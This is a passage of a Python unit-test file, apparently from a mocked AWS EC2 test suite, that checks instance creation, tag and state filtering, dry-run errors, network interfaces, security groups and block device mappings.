resp = client.create_vpc(CidrBlock=str(vpc_cidr),)
vpc_id = resp["Vpc"]["VpcId"]
resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id)
subnet_id = resp["Subnet"]["SubnetId"]
client.run_instances(
ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, SubnetId=subnet_id,
)
reservations = client.describe_instances(
Filters=[{"Name": "subnet-id", "Values": [subnet_id]}]
)["Reservations"]
reservations.should.have.length_of(1)
@mock_ec2_deprecated
def test_get_instances_filtering_by_tag():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
instance1.add_tag("tag1", "value1")
instance1.add_tag("tag2", "value2")
instance2.add_tag("tag1", "value1")
instance2.add_tag("tag2", "wrong value")
instance3.add_tag("tag2", "value2")
reservations = conn.get_all_reservations(filters={"tag:tag0": "value0"})
# get_all_reservations should return no instances
reservations.should.have.length_of(0)
reservations = conn.get_all_reservations(filters={"tag:tag1": "value1"})
# get_all_reservations should return both instances with this tag value
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(2)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance2.id)
reservations = conn.get_all_reservations(
filters={"tag:tag1": "value1", "tag:tag2": "value2"}
)
# get_all_reservations should return the instance with both tag values
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(1)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations = conn.get_all_reservations(filters={"tag:tag2": ["value2", "bogus"]})
# get_all_reservations should return both instances with one of the
# acceptable tag values
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(2)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance3.id)
@mock_ec2_deprecated
def test_get_instances_filtering_by_tag_value():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
instance1.add_tag("tag1", "value1")
instance1.add_tag("tag2", "value2")
instance2.add_tag("tag1", "value1")
instance2.add_tag("tag2", "wrong value")
instance3.add_tag("tag2", "value2")
reservations = conn.get_all_reservations(filters={"tag-value": "value0"})
# get_all_reservations should return no instances
reservations.should.have.length_of(0)
reservations = conn.get_all_reservations(filters={"tag-value": "value1"})
# get_all_reservations should return both instances with this tag value
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(2)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance2.id)
reservations = conn.get_all_reservations(
filters={"tag-value": ["value2", "value1"]}
)
# get_all_reservations should return both instances with one of the
# acceptable tag values
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(3)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance2.id)
reservations[0].instances[2].id.should.equal(instance3.id)
reservations = conn.get_all_reservations(filters={"tag-value": ["value2", "bogus"]})
# get_all_reservations should return both instances with one of the
# acceptable tag values
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(2)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance3.id)
@mock_ec2_deprecated
def test_get_instances_filtering_by_tag_name():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
instance1.add_tag("tag1")
instance1.add_tag("tag2")
instance2.add_tag("tag1")
instance2.add_tag("tag2X")
instance3.add_tag("tag3")
reservations = conn.get_all_reservations(filters={"tag-key": "tagX"})
# get_all_reservations should return no instances
reservations.should.have.length_of(0)
reservations = conn.get_all_reservations(filters={"tag-key": "tag1"})
# get_all_reservations should return both instances with this tag value
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(2)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance2.id)
reservations = conn.get_all_reservations(filters={"tag-key": ["tag1", "tag3"]})
# get_all_reservations should return both instances with one of the
# acceptable tag values
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(3)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance2.id)
reservations[0].instances[2].id.should.equal(instance3.id)
@mock_ec2_deprecated
def test_instance_start_and_stop():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=2)
instances = reservation.instances
instances.should.have.length_of(2)
instance_ids = [instance.id for instance in instances]
with pytest.raises(EC2ResponseError) as ex:
stopped_instances = conn.stop_instances(instance_ids, dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the StopInstance operation: Request would have succeeded, but DryRun flag is set"
)
stopped_instances = conn.stop_instances(instance_ids)
for instance in stopped_instances:
instance.state.should.equal("stopping")
with pytest.raises(EC2ResponseError) as ex:
started_instances = conn.start_instances([instances[0].id], dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the StartInstance operation: Request would have succeeded, but DryRun flag is set"
)
started_instances = conn.start_instances([instances[0].id])
started_instances[0].state.should.equal("pending")
@mock_ec2_deprecated
def test_instance_reboot():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
with pytest.raises(EC2ResponseError) as ex:
instance.reboot(dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the RebootInstance operation: Request would have succeeded, but DryRun flag is set"
)
instance.reboot()
instance.state.should.equal("pending")
@mock_ec2_deprecated
def test_instance_attribute_instance_type():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
with pytest.raises(EC2ResponseError) as ex:
instance.modify_attribute("instanceType", "m1.small", dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the ModifyInstanceType operation: Request would have succeeded, but DryRun flag is set"
)
instance.modify_attribute("instanceType", "m1.small")
instance_attribute = instance.get_attribute("instanceType")
instance_attribute.should.be.a(InstanceAttribute)
instance_attribute.get("instanceType").should.equal("m1.small")
@mock_ec2_deprecated
def test_modify_instance_attribute_security_groups():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
sg_id = conn.create_security_group(
"test security group", "this is a test security group"
).id
sg_id2 = conn.create_security_group(
"test security group 2", "this is a test security group 2"
).id
with pytest.raises(EC2ResponseError) as ex:
instance.modify_attribute("groupSet", [sg_id, sg_id2], dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the ModifyInstanceSecurityGroups operation: Request would have succeeded, but DryRun flag is set"
)
instance.modify_attribute("groupSet", [sg_id, sg_id2])
instance_attribute = instance.get_attribute("groupSet")
instance_attribute.should.be.a(InstanceAttribute)
group_list = instance_attribute.get("groupSet")
any(g.id == sg_id for g in group_list).should.be.ok
any(g.id == sg_id2 for g in group_list).should.be.ok
@mock_ec2_deprecated
def test_instance_attribute_user_data():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
with pytest.raises(EC2ResponseError) as ex:
instance.modify_attribute("userData", "this is my user data", dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the ModifyUserData operation: Request would have succeeded, but DryRun flag is set"
)
instance.modify_attribute("userData", "this is my user data")
instance_attribute = instance.get_attribute("userData")
instance_attribute.should.be.a(InstanceAttribute)
instance_attribute.get("userData").should.equal("this is my user data")
@mock_ec2_deprecated
def test_instance_attribute_source_dest_check():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
# Default value is true
instance.sourceDestCheck.should.equal("true")
instance_attribute = instance.get_attribute("sourceDestCheck")
instance_attribute.should.be.a(InstanceAttribute)
instance_attribute.get("sourceDestCheck").should.equal(True)
# Set to false (note: Boto converts bool to string, eg 'false')
with pytest.raises(EC2ResponseError) as ex:
instance.modify_attribute("sourceDestCheck", False, dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the ModifySourceDestCheck operation: Request would have succeeded, but DryRun flag is set"
)
instance.modify_attribute("sourceDestCheck", False)
instance.update()
instance.sourceDestCheck.should.equal("false")
instance_attribute = instance.get_attribute("sourceDestCheck")
instance_attribute.should.be.a(InstanceAttribute)
instance_attribute.get("sourceDestCheck").should.equal(False)
# Set back to true
instance.modify_attribute("sourceDestCheck", True)
instance.update()
instance.sourceDestCheck.should.equal("true")
instance_attribute = instance.get_attribute("sourceDestCheck")
instance_attribute.should.be.a(InstanceAttribute)
instance_attribute.get("sourceDestCheck").should.equal(True)
@mock_ec2_deprecated
def test_user_data_with_run_instance():
user_data = b"some user data"
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID, user_data=user_data)
instance = reservation.instances[0]
instance_attribute = instance.get_attribute("userData")
instance_attribute.should.be.a(InstanceAttribute)
retrieved_user_data = instance_attribute.get("userData").encode("utf-8")
decoded_user_data = decode_method(retrieved_user_data)
decoded_user_data.should.equal(b"some user data")
@mock_ec2_deprecated
def test_run_instance_with_security_group_name():
conn = boto.connect_ec2("the_key", "the_secret")
with pytest.raises(EC2ResponseError) as ex:
group = conn.create_security_group("group1", "some description", dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the CreateSecurityGroup operation: Request would have succeeded, but DryRun flag is set"
)
group = conn.create_security_group("group1", "some description")
reservation = conn.run_instances(EXAMPLE_AMI_ID, security_groups=["group1"])
instance = reservation.instances[0]
instance.groups[0].id.should.equal(group.id)
instance.groups[0].name.should.equal("group1")
@mock_ec2_deprecated
def test_run_instance_with_security_group_id():
conn = boto.connect_ec2("the_key", "the_secret")
group = conn.create_security_group("group1", "some description")
reservation = conn.run_instances(EXAMPLE_AMI_ID, security_group_ids=[group.id])
instance = reservation.instances[0]
instance.groups[0].id.should.equal(group.id)
instance.groups[0].name.should.equal("group1")
@mock_ec2_deprecated
def test_run_instance_with_instance_type():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID, instance_type="t1.micro")
instance = reservation.instances[0]
instance.instance_type.should.equal("t1.micro")
@mock_ec2_deprecated
def test_run_instance_with_default_placement():
conn = boto.ec2.connect_to_region("us-east-1")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
instance.placement.should.equal("us-east-1a")
@mock_ec2_deprecated
def test_run_instance_with_placement():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID, placement="us-east-1b")
instance = reservation.instances[0]
instance.placement.should.equal("us-east-1b")
@mock_ec2
def test_run_instance_with_subnet_boto3():
client = boto3.client("ec2", region_name="eu-central-1")
ip_networks = [
(ipaddress.ip_network("10.0.0.0/16"), ipaddress.ip_network("10.0.99.0/24")),
(
ipaddress.ip_network("192.168.42.0/24"),
ipaddress.ip_network("192.168.42.0/25"),
),
]
    # Test that instances are created with the correct IPs
for vpc_cidr, subnet_cidr in ip_networks:
resp = client.create_vpc(
CidrBlock=str(vpc_cidr),
AmazonProvidedIpv6CidrBlock=False,
DryRun=False,
InstanceTenancy="default",
)
vpc_id = resp["Vpc"]["VpcId"]
resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id)
subnet_id = resp["Subnet"]["SubnetId"]
resp = client.run_instances(
ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, SubnetId=subnet_id
)
instance = resp["Instances"][0]
instance["SubnetId"].should.equal(subnet_id)
priv_ipv4 = ipaddress.ip_address(six.text_type(instance["PrivateIpAddress"]))
subnet_cidr.should.contain(priv_ipv4)
@mock_ec2
def test_run_instance_with_specified_private_ipv4():
client = boto3.client("ec2", region_name="eu-central-1")
vpc_cidr = ipaddress.ip_network("192.168.42.0/24")
subnet_cidr = ipaddress.ip_network("192.168.42.0/25")
resp = client.create_vpc(
CidrBlock=str(vpc_cidr),
AmazonProvidedIpv6CidrBlock=False,
DryRun=False,
InstanceTenancy="default",
)
vpc_id = resp["Vpc"]["VpcId"]
resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id)
subnet_id = resp["Subnet"]["SubnetId"]
resp = client.run_instances(
ImageId=EXAMPLE_AMI_ID,
MaxCount=1,
MinCount=1,
SubnetId=subnet_id,
PrivateIpAddress="192.168.42.5",
)
instance = resp["Instances"][0]
instance["SubnetId"].should.equal(subnet_id)
instance["PrivateIpAddress"].should.equal("192.168.42.5")
@mock_ec2
def test_run_instance_mapped_public_ipv4():
client = boto3.client("ec2", region_name="eu-central-1")
vpc_cidr = ipaddress.ip_network("192.168.42.0/24")
subnet_cidr = ipaddress.ip_network("192.168.42.0/25")
resp = client.create_vpc(
CidrBlock=str(vpc_cidr),
AmazonProvidedIpv6CidrBlock=False,
DryRun=False,
InstanceTenancy="default",
)
vpc_id = resp["Vpc"]["VpcId"]
resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id)
subnet_id = resp["Subnet"]["SubnetId"]
client.modify_subnet_attribute(
SubnetId=subnet_id, MapPublicIpOnLaunch={"Value": True}
)
resp = client.run_instances(
ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, SubnetId=subnet_id
)
instance = resp["Instances"][0]
instance.should.contain("PublicDnsName")
instance.should.contain("PublicIpAddress")
len(instance["PublicDnsName"]).should.be.greater_than(0)
len(instance["PublicIpAddress"]).should.be.greater_than(0)
@mock_ec2_deprecated
def test_run_instance_with_nic_autocreated():
conn = boto.connect_vpc("the_key", "the_secret")
vpc = conn.create_vpc("10.0.0.0/16")
subnet = conn.create_subnet(vpc.id, "10.0.0.0/18")
security_group1 = conn.create_security_group(
"test security group #1", "this is a test security group"
)
security_group2 = conn.create_security_group(
"test security group #2", "this is a test security group"
)
private_ip = "10.0.0.1"
reservation = conn.run_instances(
EXAMPLE_AMI_ID,
subnet_id=subnet.id,
security_groups=[security_group1.name],
security_group_ids=[security_group2.id],
private_ip_address=private_ip,
)
instance = reservation.instances[0]
all_enis = conn.get_all_network_interfaces()
all_enis.should.have.length_of(1)
eni = all_enis[0]
instance.interfaces.should.have.length_of(1)
instance.interfaces[0].id.should.equal(eni.id)
instance.subnet_id.should.equal(subnet.id)
instance.groups.should.have.length_of(2)
set([group.id for group in instance.groups]).should.equal(
set([security_group1.id, security_group2.id])
)
eni.subnet_id.should.equal(subnet.id)
eni.groups.should.have.length_of(2)
set([group.id for group in eni.groups]).should.equal(
set([security_group1.id, security_group2.id])
)
eni.private_ip_addresses.should.have.length_of(1)
eni.private_ip_addresses[0].private_ip_address.should.equal(private_ip)
@mock_ec2_deprecated
def test_run_instance_with_nic_preexisting():
conn = boto.connect_vpc("the_key", "the_secret")
vpc = conn.create_vpc("10.0.0.0/16")
subnet = conn.create_subnet(vpc.id, "10.0.0.0/18")
security_group1 = conn.create_security_group(
"test security group #1", "this is a test security group"
)
security_group2 = conn.create_security_group(
"test security group #2", "this is a test security group"
)
private_ip = "54.0.0.1"
eni = conn.create_network_interface(
subnet.id, private_ip, groups=[security_group1.id]
)
    # Boto requires a NetworkInterfaceCollection of NetworkInterfaceSpecifications...
    # annoying, but it generates the desired querystring.
from boto.ec2.networkinterface import (
NetworkInterfaceSpecification,
NetworkInterfaceCollection,
)
interface = NetworkInterfaceSpecification(
network_interface_id=eni.id, device_index=0
)
interfaces = NetworkInterfaceCollection(interface)
# end Boto objects
reservation = conn.run_instances(
EXAMPLE_AMI_ID,
network_interfaces=interfaces,
security_group_ids=[security_group2.id],
)
instance = reservation.instances[0]
instance.subnet_id.should.equal(subnet.id)
all_enis = conn.get_all_network_interfaces()
all_enis.should.have.length_of(1)
instance.interfaces.should.have.length_of(1)
instance_eni = instance.interfaces[0]
instance_eni.id.should.equal(eni.id)
instance_eni.subnet_id.should.equal(subnet.id)
instance_eni.groups.should.have.length_of(2)
set([group.id for group in instance_eni.groups]).should.equal(
set([security_group1.id, security_group2.id])
)
instance_eni.private_ip_addresses.should.have.length_of(1)
instance_eni.private_ip_addresses[0].private_ip_address.should.equal(private_ip)
@requires_boto_gte("2.32.0")
@mock_ec2_deprecated
def test_instance_with_nic_attach_detach():
conn = boto.connect_vpc("the_key", "the_secret")
vpc = conn.create_vpc("10.0.0.0/16")
subnet = conn.create_subnet(vpc.id, "10.0.0.0/18")
security_group1 = conn.create_security_group(
"test security group #1", "this is a test security group"
)
security_group2 = conn.create_security_group(
"test security group #2", "this is a test security group"
)
reservation = conn.run_instances(
EXAMPLE_AMI_ID, security_group_ids=[security_group1.id]
)
instance = reservation.instances[0]
eni = conn.create_network_interface(subnet.id, groups=[security_group2.id])
# Check initial instance and ENI data
instance.interfaces.should.have.length_of(1)
eni.groups.should.have.length_of(1)
set([group.id for group in eni.groups]).should.equal(set([security_group2.id]))
# Attach
with pytest.raises(EC2ResponseError) as ex:
conn.attach_network_interface(eni.id, instance.id, device_index=1, dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the AttachNetworkInterface operation: Request would have succeeded, but DryRun flag is set"
)
conn.attach_network_interface(eni.id, instance.id, device_index=1)
# Check attached instance and ENI data
instance.update()
instance.interfaces.should.have.length_of(2)
instance_eni = instance.interfaces[1]
instance_eni.id.should.equal(eni.id)
instance_eni.groups.should.have.length_of(2)
set([group.id for group in instance_eni.groups]).should.equal(
set([security_group1.id, security_group2.id])
)
eni = conn.get_all_network_interfaces(filters={"network-interface-id": eni.id})[0]
eni.groups.should.have.length_of(2)
set([group.id for group in eni.groups]).should.equal(
set([security_group1.id, security_group2.id])
)
# Detach
with pytest.raises(EC2ResponseError) as ex:
conn.detach_network_interface(instance_eni.attachment.id, dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the DetachNetworkInterface operation: Request would have succeeded, but DryRun flag is set"
)
conn.detach_network_interface(instance_eni.attachment.id)
# Check detached instance and ENI data
instance.update()
instance.interfaces.should.have.length_of(1)
eni = conn.get_all_network_interfaces(filters={"network-interface-id": eni.id})[0]
eni.groups.should.have.length_of(1)
set([group.id for group in eni.groups]).should.equal(set([security_group2.id]))
# Detach with invalid attachment ID
with pytest.raises(EC2ResponseError) as cm:
conn.detach_network_interface("eni-attach-1234abcd")
cm.value.code.should.equal("InvalidAttachmentID.NotFound")
cm.value.status.should.equal(400)
cm.value.request_id.should_not.be.none
@mock_ec2_deprecated
def test_ec2_classic_has_public_ip_address():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID, key_name="keypair_name")
instance = reservation.instances[0]
instance.ip_address.should_not.equal(None)
instance.public_dns_name.should.contain(instance.ip_address.replace(".", "-"))
instance.private_ip_address.should_not.equal(None)
instance.private_dns_name.should.contain(
instance.private_ip_address.replace(".", "-")
)
@mock_ec2_deprecated
def test_run_instance_with_keypair():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID, key_name="keypair_name")
instance = reservation.instances[0]
instance.key_name.should.equal("keypair_name")
@mock_ec2
def test_run_instance_with_block_device_mappings():
ec2_client = boto3.client("ec2", region_name="us-east-1")
kwargs = {
"MinCount": 1,
"MaxCount": 1,
"ImageId": EXAMPLE_AMI_ID,
"KeyName": "the_key",
"InstanceType": "t1.micro",
"BlockDeviceMappings": [{"DeviceName": "/dev/sda2", "Ebs": {"VolumeSize": 50}}],
}
ec2_client.run_instances(**kwargs)
instances = ec2_client.describe_instances()
volume = instances["Reservations"][0]["Instances"][0]["BlockDeviceMappings"][0][
"Ebs"
]
volumes = ec2_client.describe_volumes(VolumeIds=[volume["VolumeId"]])
volumes["Volumes"][0]["Size"].should.equal(50)
@mock_ec2
def test_run_instance_with_block_device_mappings_missing_ebs():
ec2_client = boto3.client("ec2", region_name="us-east-1")
kwargs = {
"MinCount": 1,
"MaxCount": 1,
"ImageId": EXAMPLE_AMI_ID,
"KeyName": "the_key",
"InstanceType": "t1.micro",
"BlockDeviceMappings": [{"DeviceName": "/dev/sda2"}],
}
with pytest.raises(ClientError) as ex:
ec2_client.run_instances(**kwargs)
ex.value.response["Error"]["Code"].should.equal("MissingParameter")
ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400)
ex.value.response["Error"]["Message"].should.equal(
"The request must contain the parameter ebs"
)
@mock_ec2
def test_run_instance_with_block_device_mappings_missing_size():
ec2_client = boto3.client("ec2", region_name="us-east-1")
kwargs = {
"MinCount": 1,
"MaxCount": 1,
"ImageId": EXAMPLE_AMI_ID,
"KeyName": "the_key",
"InstanceType": "t1.micro",
"BlockDeviceMappings": [
{"DeviceName": "/dev/sda2", "Ebs": {"VolumeType": "standard"}}
],
}
with pytest.raises(ClientError) as ex:
ec2_client.run_instances(**kwargs)
ex.value.response["Error"]["Code"].should.equal("MissingParameter")
ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400)
ex.value.response["Error"]["Message"].should.equal(
"The request must contain the parameter size or snapshotId"
)
@mock_ec2
def test_run_instance_with_block_device_mappings_from_snapshot():
ec2_client = boto3.client("ec2", region_name="us-east-1")
ec2_resource = boto3.resource("ec2", region_name="us-east-1")
volume_details = {
"AvailabilityZone": "1a",
"Size": 30,
}
volume = ec2_resource.create_volume(**volume_details)
snapshot = volume.create_snapshot()
kwargs = {
"MinCount": 1,
"MaxCount": 1,
"ImageId": EXAMPLE_AMI_ID,
"KeyName": "the_key",
"InstanceType": "t1.micro",
"BlockDeviceMappings": [
{"DeviceName": "/dev/sda2", "Ebs": {"SnapshotId": snapshot.snapshot_id}}
],
}
ec2_client.run_instances(**kwargs)
instances = ec2_client.describe_instances()
volume = instances["Reservations"][0]["Instances"][0]["BlockDeviceMappings"][0][
"Ebs"
]
volumes = ec2_client.describe_volumes(VolumeIds=[volume["VolumeId"]])
volumes["Volumes"][0]["Size"].should.equal(30)
volumes["Volumes"][0]["SnapshotId"].should.equal(snapshot.snapshot_id)
@mock_ec2_deprecated
def test_describe_instance_status_no_instances():
conn = boto.connect_ec2("the_key", "the_secret")
all_status = conn.get_all_instance_status()
len(all_status).should.equal(0)
@mock_ec2_deprecated
def test_describe_instance_status_with_instances():
conn = boto.connect_ec2("the_key", "the_secret")
conn.run_instances(EXAMPLE_AMI_ID, key_name="keypair_name")
all_status = conn.get_all_instance_status()
len(all_status).should.equal(1)
all_status[0].instance_status.status.should.equal("ok")
all_status[0].system_status.status.should.equal("ok")
@mock_ec2_deprecated
def test_describe_instance_status_with_instance_filter_deprecated():
conn = boto.connect_ec2("the_key", "the_secret")
# We want to filter based on this one
reservation = conn.run_instances(EXAMPLE_AMI_ID, key_name="keypair_name")
instance = reservation.instances[0]
    # This is just to set up the test
conn.run_instances(EXAMPLE_AMI_ID, key_name="keypair_name")
all_status = conn.get_all_instance_status(instance_ids=[instance.id])
len(all_status).should.equal(1)
all_status[0].id.should.equal(instance.id)
    # Calling get_all_instance_status with a bad id should raise an error
with pytest.raises(EC2ResponseError) as cm:
conn.get_all_instance_status(instance_ids=[instance.id, "i-1234abcd"])
cm.value.code.should.equal("InvalidInstanceID.NotFound")
cm.value.status.should.equal(400)
cm.value.request_id.should_not.be.none
@mock_ec2
def test_describe_instance_credit_specifications():
conn = boto3.client("ec2", region_name="us-west-1")
    # Create an instance whose credit specification we can look up
reservation = conn.run_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)
result = conn.describe_instance_credit_specifications(
InstanceIds=[reservation["Instances"][0]["InstanceId"]]
)
assert (
result["InstanceCreditSpecifications"][0]["InstanceId"]
== reservation["Instances"][0]["InstanceId"]
)
@mock_ec2
def test_describe_instance_status_with_instance_filter():
conn = boto3.client("ec2", region_name="us-west-1")
    # Create three instances and stop one so we can filter by state
reservation = conn.run_instances(ImageId=EXAMPLE_AMI_ID, MinCount=3, MaxCount=3)
instance1 = reservation["Instances"][0]
instance2 = reservation["Instances"][1]
instance3 = reservation["Instances"][2]
conn.stop_instances(InstanceIds=[instance1["InstanceId"]])
stopped_instance_ids = [instance1["InstanceId"]]
running_instance_ids = sorted([instance2["InstanceId"], instance3["InstanceId"]])
all_instance_ids = sorted(stopped_instance_ids + running_instance_ids)
# Filter instance using the state name
state_name_filter = {
"running_and_stopped": [
{"Name": "instance-state-name", "Values": ["running", "stopped"]}
],
"running": [{"Name": "instance-state-name", "Values": ["running"]}],
"stopped": [{"Name": "instance-state-name", "Values": ["stopped"]}],
}
found_statuses = conn.describe_instance_status(
IncludeAllInstances=True, Filters=state_name_filter["running_and_stopped"]
)["InstanceStatuses"]
found_instance_ids = [status["InstanceId"] for status in found_statuses]
sorted(found_instance_ids).should.equal(all_instance_ids)
found_statuses = conn.describe_instance_status(
IncludeAllInstances=True, Filters=state_name_filter["running"]
)["InstanceStatuses"]
found_instance_ids = [status["InstanceId"] for status in found_statuses]
sorted(found_instance_ids).should.equal(running_instance_ids)
found_statuses = conn.describe_instance_status(
IncludeAllInstances=True, Filters=state_name_filter["stopped"]
)["InstanceStatuses"]
found_instance_ids = [status["InstanceId"] for status in found_statuses]
sorted(found_instance_ids).should.equal(stopped_instance_ids)
# Filter instance using the state code
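    # (EC2 encodes instance states numerically: 16 = running, 80 = stopped.)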
state_code_filter = {
"running_and_stopped": [
{"Name": "instance-state-code", "Values": ["16", "80"]}
],
"running": [{"Name": "instance-state-code", "Values": ["16"]}],
"stopped": [{"Name": "instance-state-code", "Values": ["80"]}],
}
found_statuses = conn.describe_instance_status(
IncludeAllInstances=True, Filters=state_code_filter["running_and_stopped"]
)["InstanceStatuses"]
found_instance_ids = [status["InstanceId"] for status in found_statuses]
sorted(found_instance_ids).should.equal(all_instance_ids)
found_statuses = conn.describe_instance_status(
IncludeAllInstances=True, Filters=state_code_filter["running"]
)["InstanceStatuses"]
found_instance_ids = [status["InstanceId"] for status in found_statuses]
sorted(found_instance_ids).should.equal(running_instance_ids)
found_statuses = conn.describe_instance_status(
IncludeAllInstances=True, Filters=state_code_filter["stopped"]
)["InstanceStatuses"]
found_instance_ids = [status["InstanceId"] for status in found_statuses]
sorted(found_instance_ids).should.equal(stopped_instance_ids)
@requires_boto_gte("2.32.0")
@mock_ec2_deprecated
def test_describe_instance_status_with_non_running_instances():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
instance1.stop()
instance2.terminate()
all_running_status = conn.get_all_instance_status()
all_running_status.should.have.length_of(1)
all_running_status[0].id.should.equal(instance3.id)
all_running_status[0].state_name.should.equal("running")
all_status = conn.get_all_instance_status(include_all_instances=True)
all_status.should.have.length_of(3)
status1 = next((s for s in all_status if s.id == instance1.id), None)
status1.state_name.should.equal("stopped")
status2 = next((s for s in all_status if s.id == instance2.id), None)
status2.state_name.should.equal("terminated")
status3 = next((s for s in all_status if s.id == instance3.id), None)
status3.state_name.should.equal("running")
@mock_ec2_deprecated
def test_get_instance_by_security_group():
conn = boto.connect_ec2("the_key", "the_secret")
conn.run_instances(EXAMPLE_AMI_ID)
instance = conn.get_only_instances()[0]
security_group = conn.create_security_group("test", "test")
with pytest.raises(EC2ResponseError) as ex:
conn.modify_instance_attribute(
instance.id, "groupSet", [security_group.id], dry_run=True
)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the ModifyInstanceSecurityGroups operation: Request would have succeeded, but DryRun flag is set"
)
conn.modify_instance_attribute(instance.id, "groupSet", [security_group.id])
security_group_instances = security_group.instances()
assert len(security_group_instances) == 1
assert security_group_instances[0].id == instance.id
@mock_ec2
def test_modify_delete_on_termination():
ec2_client = boto3.resource("ec2", region_name="us-west-1")
result = ec2_client.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)
instance = result[0]
instance.load()
instance.block_device_mappings[0]["Ebs"]["DeleteOnTermination"].should.be(True)
instance.modify_attribute(
BlockDeviceMappings=[
{"DeviceName": "/dev/sda1", "Ebs": {"DeleteOnTermination": False}}
]
)
instance.load()
instance.block_device_mappings[0]["Ebs"]["DeleteOnTermination"].should.be(False)
@mock_ec2
def test_create_instance_ebs_optimized():
ec2_resource = boto3.resource("ec2", region_name="eu-west-1")
instance = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, EbsOptimized=True
)[0]
instance.load()
instance.ebs_optimized.should.be(True)
instance.modify_attribute(EbsOptimized={"Value": False})
instance.load()
instance.ebs_optimized.should.be(False)
instance = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1,
)[0]
instance.load()
instance.ebs_optimized.should.be(False)
@mock_ec2
def test_run_multiple_instances_in_same_command():
instance_count = 4
